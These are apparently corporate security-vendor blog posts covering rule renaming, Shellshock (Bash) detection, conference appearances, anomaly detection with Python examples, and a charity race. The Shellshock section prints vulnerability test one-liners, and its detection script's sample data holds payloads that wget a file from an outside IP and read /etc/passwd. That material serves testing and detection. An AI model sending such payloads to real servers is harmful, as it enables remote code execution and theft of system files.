Name Changes for AI Engine Rules

With the current Knowledge Base release, LogRhythm Labs is introducing the first round of changes to AI Engine Rule organization. This initial stage implements a more intuitive naming scheme for AI Engine Rules. (Note: compliance-based AI Engine Rules will keep their existing names.)

AI Engine Rule Naming Conventions

LogRhythm has over 500 AI Engine rules, and each one detects very specific, complex activity. The rules are typically named by this complex activity, but obviously names must be kept to a reasonable length. This presents a problem – an analyst needs to be able to look at any one of these 500+ rules and immediately know what the alarm indicates without needing to read an entire paragraph. Likewise, a SIEM administrator needs to choose the rules that should be enabled when LogRhythm is deployed. When rule names are too difficult to understand, these tasks can be quite challenging.

The new naming convention addresses this problem by applying a simple and consistent template: First, rule names will begin with the most important information that an analyst needs to investigate an alarm. This means labeling the rules by broader categories, giving the analyst a solid starting point. For example, rules that detect a malware event will be in the ‘Malware’ category, rules that detect suspicious network behavior will be in ‘Network Anomaly’, rules that detect a denial of service attack will be in the ‘DoS’ category, etc.

Our first iteration includes the following categories:

  • Attack – Attempts to gain access to a system, such as brute force authentication attempts or SQL Injection, or generic Attack events as generated by other deployed security devices. The source is assumed to be external to the organization’s network unless specified in the rule name.
  • Compromise – A Host or Account has been accessed by an unauthorized user or malicious process.
  • Denial of Service (DoS) – A specific type of attack that attempts to disable or interrupt use of a service or host.
  • Malware – Activity associated with known malware.
  • Misuse – Improper use of organization resources.
  • Operations (Ops) – Activity related to system and network operation. For example, unusual log fluctuations, power issues, or backup failures. Operations is also subdivided into severity levels — warning, error, critical.
  • Reconnaissance (Recon) – Techniques to identify, fingerprint, or map network devices and services.
  • Vulnerability – Information regarding vulnerabilities in the network.

And three anomaly categories for suspicious behavior that might be malicious:

  • Account Anomaly – anomalies related to identities.
  • Host Anomaly – anomalies related to endpoints.
  • Network Anomaly – anomalies related to network activity.

Following the category, names use a more conventional spacing and punctuation arrangement: a colon and a space (': ') separate the category from the rest of the rule name.

This final part of the name is a brief description of the specific activity associated with the rule. To meet length limitations of the software, several abbreviations are used: for example, 'Auth' for authentication or login, 'Admin' for administrator or privileged user, 'Ops' for operations, etc. For directionality (inbound, outbound, internal, etc.), only unusual or critical information is placed in the name; otherwise the most common directionality of the security event is assumed and left out. For example, attacks against web servers generally come from external sources, while malware beacons come from internal hosts. Because this is fairly obvious, those names don't need to include directionality. However, if a web server is being attacked from an internal source, or malware is beaconing inside the organization's network, that is a critical situation, and the name will reflect that a compromise may have occurred.

Here are a couple of examples of the transition from old to new format:

Acnt Susp:Abnormal File Access
-> Account Anomaly: Abnormal File Access

Ext:Host Atck:XSS Attack
-> Attack: Cross-site Scripting (XSS)

Int:Host Comp:Attack/Compromise Followed by Critical
-> Compromise: Lateral Movement then Critical Event

Int:Susp:Multiple Object Access Failures
-> Host Anomaly: Multiple Object Access Failures

Ext:Susp:LR Threat List:URL:Bot
-> Malware: Threat List Bot URL

New Documentation

Security Module documentation should now be updated to also reflect the new naming system. In the coming months, additional changes will be made to how rules are grouped together in the Knowledge Base.

Likewise, the Threat Detection Cookbook will now have an updated format. If you’re unfamiliar with the Cookbook, it’s a document maintained by LogRhythm Labs that explains the usage of a few dozen notable AI Engine Rules. If you want to check out the latest version, head over to the How To section of the support forum:




Bash Vulnerability Detection

I won't bore anyone with the details of this very popular Bash bug, since there are already plenty of good write-ups by other researchers. However, it is worth pointing out that this vulnerability carries the highest possible Common Vulnerability Scoring System (CVSS) base score, 10.0, a score that not even the infamous Heartbleed achieved. In my own research that score is definitely warranted, given the sheer number of affected hosts: even in our own malware research lab we couldn't find a single machine that wasn't vulnerable. That really makes me wonder how many other hosts out there are also vulnerable to this bug. So let's quickly recap the six (and counting) CVEs related to this Bash vulnerability.


Processes trailing strings after function definitions in the values of environment variables (the original bug). Test:

       env x='() { :;}; echo vulnerable' bash -c "echo test"

A vulnerable bash prints "vulnerable" before "test"; a patched one prints only "test".


Untrusted pointer use leading to code execution.

       Details not yet made public


Inability to properly parse function definitions in the values of environment variables.

       Details not yet made public


Shows that processing of trailing strings after function definitions still occurs after the fix for CVE-2014-6271 was released. Test:

       env X='() { (a)=>\' sh -c "echo date"; cat echo

On a vulnerable system a file named echo is created in the current directory, containing the output of the date command.


Causes a denial of service (out-of-bounds array access) by way of multiple <<EOF declarations (CVE-2014-7186, redir_stack). Test:

       bash -c 'true <<EOF <<EOF <<EOF <<EOF <<EOF <<EOF <<EOF <<EOF <<EOF <<EOF <<EOF <<EOF <<EOF <<EOF' || echo "CVE-2014-7186 vulnerable, redir_stack"


Causes a denial of service (out-of-bounds array access) through an off-by-one error in the read_token_word function in parse.y (CVE-2014-7187, word_lineno). Test:

       (for x in {1..200} ; do echo "for x$x in ; do :"; done; for x in {1..200} ; do echo done ; done) | bash || echo "CVE-2014-7187 vulnerable, word_lineno"

The real challenge with all of these vulnerabilities is that there are so many different ways the bug can be reached that it is nearly impossible to deploy one solution that detects every attack vector. However, the attacks we have already seen in the wild arrive as a web request to an Apache or other Linux-flavored web server that hands request data to a CGI script (just as in this HTTP proof of concept). A CGI-enabled web server exports the request headers to the script as environment variables, and the payload always begins with the function-definition prefix '() {', so the obvious places to look for it are these HTTP headers:

  • User-Agent strings
  • Cookies
  • Host (server)
  • Referer

And also:

  • Web server error and access logs

The LogRhythm Labs team has developed a set of rules to alert you to these attacks when your web server observes them. You can find these rules in the latest LogRhythm Knowledge Base under AIE Rule IDs 559 and 660, 'Attack: Bash Vulnerability Exploit'.
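As an added example (my own illustration, not the logic of the LogRhythm rules above, which this post does not publish), the following Python script runs the detection idea from the list over a few constructed Apache combined-format access log lines and one constructed raw HTTP request. It looks for the '() {' function-definition prefix in the request line, Referer and User-Agent fields of the log, and in every header of the raw request, since mod_cgi exports all of them as HTTP_* environment variables. The IP addresses, paths and payloads are made up for the example.

```python
import re
from urllib.parse import unquote

# The trigger the whole Shellshock family shares: a value that begins with a bash
# function definition, "() {". Matching on that prefix (with optional whitespace)
# rather than on any particular payload catches the variants seen in the wild.
SHELLSHOCK_RE = re.compile(r"\(\)\s*\{")

# Apache "combined" access log format. Quoted fields may contain \" escapes, which
# is exactly what a payload such as /bin/bash -c "..." produces in the log.
_QUOTED = r'(?:[^"\\]|\\.)*'
COMBINED_RE = re.compile(
    r'^(?P<client>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] '
    r'"(?P<request>' + _QUOTED + r')" (?P<status>\d{3}) (?P<bytes>\S+) '
    r'"(?P<referer>' + _QUOTED + r')" "(?P<agent>' + _QUOTED + r')"$'
)


def scan_field(name, value):
    """Return (name, snippet) if the field carries the trigger, else None.

    The raw value is what bash sees in HTTP_* and QUERY_STRING variables; the
    URL-decoded form is checked too, for CGI scripts that decode their own
    input before handing it to a subshell.
    """
    for candidate in (value, unquote(value)):
        m = SHELLSHOCK_RE.search(candidate)
        if m:
            return (name, candidate[m.start():m.start() + 40])
    return None


def scan_access_log(lines):
    """Scan combined-format access log lines; return one dict per suspicious line."""
    hits = []
    for lineno, line in enumerate(lines, 1):
        m = COMBINED_RE.match(line)
        if not m:
            continue  # not combined format (or truncated); a real deployment would count these
        for field in ("request", "referer", "agent"):
            hit = scan_field(field, m.group(field))
            if hit:
                hits.append({"line": lineno, "client": m.group("client"),
                             "field": hit[0], "snippet": hit[1]})
    return hits


def scan_headers(raw_request):
    """Scan every header of a raw HTTP request; return a list of (header, snippet).

    The access log records only a few headers, but mod_cgi exports them all as
    HTTP_<NAME> environment variables, so Host, Cookie or any custom header is
    as good a carrier as User-Agent.
    """
    hits = []
    for header in raw_request.split("\r\n")[1:]:
        if ":" not in header:
            continue
        name, value = header.split(":", 1)
        hit = scan_field(name.strip(), value.strip())
        if hit:
            hits.append(hit)
    return hits


# Constructed sample data (not real traffic). Line 1 carries the payload in the
# User-Agent, line 2 is benign, line 3 carries a percent-encoded copy in the query string.
SAMPLE_ACCESS_LOG = [
    '203.0.113.5 - - [25/Sep/2014:14:02:11 +0000] "GET /cgi-bin/status HTTP/1.1" 200 512 "-" '
    '"() { :;}; /bin/bash -c \\"wget http://198.51.100.7/x -O /tmp/x\\""',
    '198.51.100.23 - - [25/Sep/2014:14:02:15 +0000] "GET /index.html HTTP/1.1" 200 1024 '
    '"http://www.example.com/" "Mozilla/5.0 (X11; Linux x86_64)"',
    '203.0.113.9 - - [25/Sep/2014:14:03:40 +0000] '
    '"GET /cgi-bin/test.cgi?%28%29%20%7B%20%3A%3B%7D%3B%20id HTTP/1.1" 200 77 "-" "curl/7.37.0"',
]

# Constructed raw request: the payload rides in Host and Referer, Cookie is benign.
SAMPLE_REQUEST = (
    "GET /cgi-bin/status HTTP/1.1\r\n"
    "Host: () { :;}; /bin/bash -c 'cat /etc/passwd'\r\n"
    "Cookie: session=abc123\r\n"
    "Referer: () { ignored;}; /usr/bin/id\r\n"
    "\r\n"
)

if __name__ == "__main__":
    for hit in scan_access_log(SAMPLE_ACCESS_LOG):
        print("access log line %(line)d from %(client)s: %(field)s = %(snippet)r" % hit)
    for header, snippet in scan_headers(SAMPLE_REQUEST):
        print("request header %s = %r" % (header, snippet))
```

Matching on the prefix rather than on a specific payload is deliberate: the payload after '() {' varies from attack to attack, but the prefix cannot, because it is what makes bash treat the variable as a function definition. The cost is the occasional false positive on a legitimate value containing '() {', which is rare enough in HTTP headers to be worth it.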

Bash Vulnerability LogRhythm SmartResponse Rule




LogRhythm is at Les Assises, IT-SA and IP-EXPO in October 2014

We’re gearing up for a busy October! Next month, we’ll be at three events in three different countries, with booths at Les Assises in Monaco, IT-SA in Nuremberg and IP-EXPO in London. With our cyber security experts on hand, we’re ready to help organizations around the world detect and respond to threats and breaches more effectively. Here’s a quick rundown of what to expect at the events:

Les Assises, Monaco 1-4 October 

  • Catch our seminar. Nicolas Stricher and Jean Pierre Carlin will be leading a seminar titled ‘Cyber-attacks have evolved; have your security defenses?’ Drop in on their talk on 2nd October at 10:00 to find out what security intelligence tools are needed to give pervasive visibility of your network. 
  • Meet our team of experts. Stop by our booth and have all your questions answered. Our dedicated team has the experience and knowledge of combating today’s most sophisticated cyber threats, and will be on hand to chat all things security related at the show.
  • Check out our demos. Our solutions are award-winning and continue to be recognized amongst the most innovative in the industry. From our Cyber Threat Ecosystem to our Honeypot and Retail Security Analytics Suite, our solutions are enabling organizations to quickly detect and respond to threats and breaches. Just stop by the booth to see for yourself!

IT-SA, Nuremberg 7-9 October 

  • Come and say hi. We’ll be at our partner, Exclusive Networks’ stand in hall 12, 12.0-401. Our experts have seen the most sophisticated cyber threats in action and know the advanced tools needed to combat them. With this firsthand experience, the team will be ready for all of your IT security questions – no matter how tough!
  • Which solution is best for you? Our security intelligence solutions are enabling German organizations from multiple sectors to combat cybercrime. To find out which one is best suited to your needs, stop by the booth and ask a member of the team.

IP-EXPO, London 8-9 October

  • You can’t miss us! Our stand B2 is right at the front, so you have no excuse not to stop and have a chat with one of our experts! Our team will be available to answer any questions you may have and ensure you leave with a better understanding of how to combat today’s sophisticated cyber threats.
  • Join our seminar. I will be leading a seminar titled, ‘Cyber-attacks have evolved; have your security defenses?’ on Wednesday 8th October at 12:20 in the Cyber Attack Remediation and Mitigation theatre. Stop by to hear why antivirus and perimeter security measures are no longer enough, and why monitoring and remediation technologies are more important than ever to proactively fight cybercrime.
  • Is today your lucky day? We’ll be giving away a GoPro Hero 3 video camera at the booth!  For the chance to win, simply pop by and leave your business card with us.  We’ll be announcing the winner on the booth and via our Twitter feed – so make sure you’re following us (@LogRhythm).
  • Experience award winning solutions first hand. If you stop by our booth you’ll see live demos of our award winning SIEM platform. See for yourself how our security intelligence solutions ensure proactive, continuous monitoring to detect and remediate abnormal activity, thus mitigating damage inflicted by cyber attacks. Our dedicated team have created the sophisticated tools needed to combat cybercrime, so find out how they can help you!

There’s still plenty of time to register for all three, so you really have no excuse for not coming to see us!



Anomaly Detection and Cyber Discovery

Utilizing signature-related detection, such as traditional Antivirus or Intrusion Detection Systems, is obviously an important best-practice for any information security operation. However, for detection of advanced threats, static signatures will simply not be effective — even without their techniques being publicly disclosed, advanced malicious actors will constantly change their infrastructure and malicious code to easily avoid these countermeasures.

To find new, previously unknown malicious activity (a process known as ‘cyber discovery’), anomalous behavior detection is the most effective method. Being able to perform cyber discovery is the vital step that separates an active security operation team capable of finding novel, targeted attacks from a reactive one, only capable of implementing signatures after they or another organization have already been compromised. Monitoring suspicious behaviors is one of the first steps that allows the security operations team to actively hunt down advanced threats within their network.

Although there’s no widely accepted taxonomy, the two primary methodologies used to detect security-related anomalous activity are statistical and heuristic:

  • Statistical anomalies – if a measured, important value crosses a threshold or deviates from some mathematical norm, this can be used as an indicator of malicious activity. For example, if a user typically sends 2GB of data a day but is sending 2TB, this might be a sign of data exfiltration.
  • Heuristic anomalies – general, suspicious behaviors that are related to actions a malicious actor takes during an attack cycle. For example, if an organization is seeing many open connections to a country where they don’t conduct business, this should be a warning sign. Likewise, if a point of sale system only ever runs a known group of processes, but then suddenly a new one appears, it should be treated as highly suspect.
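To make the two methodologies concrete, here is an added example in Python (my own illustration, not LogRhythm's rule engine or code). The statistical check flags a user's daily transfer volume when it deviates from that user's own baseline by more than a chosen number of standard deviations; the heuristic checks flag an unexpected process on a point-of-sale host and a cluster of connections to a country outside an expected set. The baseline, the allowlists, the thresholds and the events are all constructed for the example.

```python
from collections import Counter
from statistics import mean, pstdev

# Constructed baseline (not real data): bytes sent per day by one user over two weeks.
USER_HISTORY_BYTES = [2.1e9, 1.9e9, 2.3e9, 2.0e9, 1.8e9, 2.2e9, 2.0e9,
                      2.4e9, 1.7e9, 2.1e9, 2.0e9, 2.2e9, 1.9e9, 2.1e9]

# Constructed allowlists (assumptions for the example): the processes a point-of-sale
# terminal is expected to run, and the countries the organization does business with.
POS_BASELINE_PROCESSES = {"pos.exe", "svchost.exe", "lsass.exe", "explorer.exe"}
EXPECTED_COUNTRIES = {"US", "CA", "GB"}


def statistical_anomaly(history, observed, z_threshold=3.0, min_samples=7):
    """Statistical anomaly: does `observed` sit more than z_threshold standard
    deviations away from this user's own baseline? Returns (is_anomalous, z).

    With too little history the baseline is meaningless, so the function
    declines to judge rather than raise a noisy alarm."""
    if len(history) < min_samples:
        return (False, 0.0)
    mu, sigma = mean(history), pstdev(history)
    if sigma == 0.0:
        # A perfectly flat baseline: any change at all is a deviation.
        return (observed != mu, float("inf") if observed != mu else 0.0)
    z = (observed - mu) / sigma
    return (abs(z) > z_threshold, z)


def heuristic_anomalies(events, min_connections=10):
    """Heuristic anomalies: behaviours tied to what an attacker does, judged
    against simple expectations instead of a distribution. Returns a list of
    (host, reason) findings."""
    findings = []
    foreign = Counter()
    for ev in events:
        if ev["type"] == "process_start" and ev["host_role"] == "pos":
            if ev["process"].lower() not in POS_BASELINE_PROCESSES:
                findings.append((ev["host"], "unexpected process on POS host: " + ev["process"]))
        elif ev["type"] == "connection" and ev["dst_country"] not in EXPECTED_COUNTRIES:
            foreign[(ev["host"], ev["dst_country"])] += 1
    # One connection to an unusual country is noise; a sustained cluster is a warning sign.
    for (host, country), n in foreign.items():
        if n >= min_connections:
            findings.append((host, "%d connections to %s, outside expected countries" % (n, country)))
    return findings


# Constructed events: a POS terminal launching an archiver, a workstation with a
# dozen connections to an unexpected country ("ZZ" is a user-assigned ISO code),
# and a second workstation with routine connections to an expected one.
SAMPLE_EVENTS = (
    [{"type": "process_start", "host": "POS-017", "host_role": "pos", "process": "pos.exe"},
     {"type": "process_start", "host": "POS-017", "host_role": "pos", "process": "rar.exe"}]
    + [{"type": "connection", "host": "WS-042", "host_role": "workstation",
        "dst_country": "ZZ", "dst_port": 443} for _ in range(12)]
    + [{"type": "connection", "host": "WS-043", "host_role": "workstation",
        "dst_country": "GB", "dst_port": 443} for _ in range(30)]
)

if __name__ == "__main__":
    flagged, z = statistical_anomaly(USER_HISTORY_BYTES, 2.0e12)
    print("2 TB sent today: anomalous=%s (z=%.1f)" % (flagged, z))
    for host, reason in heuristic_anomalies(SAMPLE_EVENTS):
        print("%s: %s" % (host, reason))
```

Two design points carry over to real deployments: the statistical check is per-user, because a volume that is normal for a backup server is wild for a receptionist, and the heuristic check counts connections before alarming, because a single stray connection to an unexpected country is exactly the kind of weak indicator that drowns analysts in false positives.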

Although a vital step toward a high level of security, anomaly detection also involves a great deal of time, effort, and expertise. By definition, anomalies are not proof of malicious activity, only a clue that something strange is happening. If a signature is considered a 'strong' indicator, firing only when the detected behavior exactly matches known malicious activity (e.g., a string or URL), then heuristics are 'weak' indicators, firing when something may be malicious. As a result, they generate many more false-positive alerts and require more in-depth investigation of those alerts.

Additionally, specialized tools will be needed across a multitude of data sources — network traffic monitoring, host-based monitoring, user activity tracking, etc. Any tools that hope to perform anomaly detection must be both extremely flexible and extremely powerful — storing data and calculating statistical and heuristic anomalies for a multi-Gbps network with thousands of users is incredibly complex and resource intensive. Implementing an interface that easily allows for both the creation of anomaly rules and their investigation is also quite challenging.

Fortunately, SIEMs with advanced rule engines (like LogRhythm) can bring together all of the important data across the network, implement anomaly detection rules, and allow analysts to drill down into the results. Just keep in mind that the software itself will never perform cyber discovery — this can only be accomplished when it is used alongside a trained security operations team capable of analyzing its output. But when used together, an organization has equipped itself with the means of defending against the most advanced adversaries.




Colorado Tough Mudder 2014

This past weekend, I joined 7 other LogRhythm employees and participated in an event called the Tough Mudder, in Snowmass, Colorado.  Tough Mudder events are held around the world, throughout the year, to raise money for veterans' organizations based in various countries, including Wounded Warrior Project (USA), Help for Heroes (UK) and Legacy (AU).  The event was an 11-mile race that began at 8,200 ft. above sea level and climbed an additional 2,500 ft., and included 25 military-style obstacles designed by British Special Forces.

The LogRhythm team consisted of Jay Strickland and Keith Willowhawk from our IT/IS group, Nama Illo from our Customer Care team, JoJo Brotamonte and Eric Howell from Sales, and Katie Herrmann, Colby Schwartz and myself from Marketing.  Despite the heat, the elevation, the electric shock treatments, the "arctic enema" (yes, that's actually the name of an obstacle: an industrial-sized dumpster filled with ice water into which participants are required to plunge), and massive walls of mud and rock, we completed the course with the team intact and with wide, albeit muddy, smiles.

Shock Therapy


We all felt the joy and satisfaction that comes from finishing an event like the Tough Mudder.  Coming together as a team in a spirit of camaraderie, support and collaboration made it even sweeter.  But the peak of our day was toasting the generosity of our supporters and sponsors who collectively donated over $5,300 to the Wounded Warrior Project.  As LogRhythm employees, we get to come to work every day knowing that we're helping to protect the world from dangerous cyber threats, and that's pretty cool.  But knowing that spending an afternoon with my coworkers for an adventure in the mud and frigid waters of Snowmass, supported by extremely generous sponsors, will help some true heroes breathe a little easier, walk a little straighter or hug their loved ones a little tighter, takes the joy and satisfaction to a whole new level.

Many thanks to my team members, our generous sponsors, the Tough Mudder organization and the Wounded Warrior Project for making this event so successful.  But most of all, thanks to all of the men and women of our armed services for sacrificing themselves every day to protect and preserve our very way of life.

LogRhythm Tough Mudders

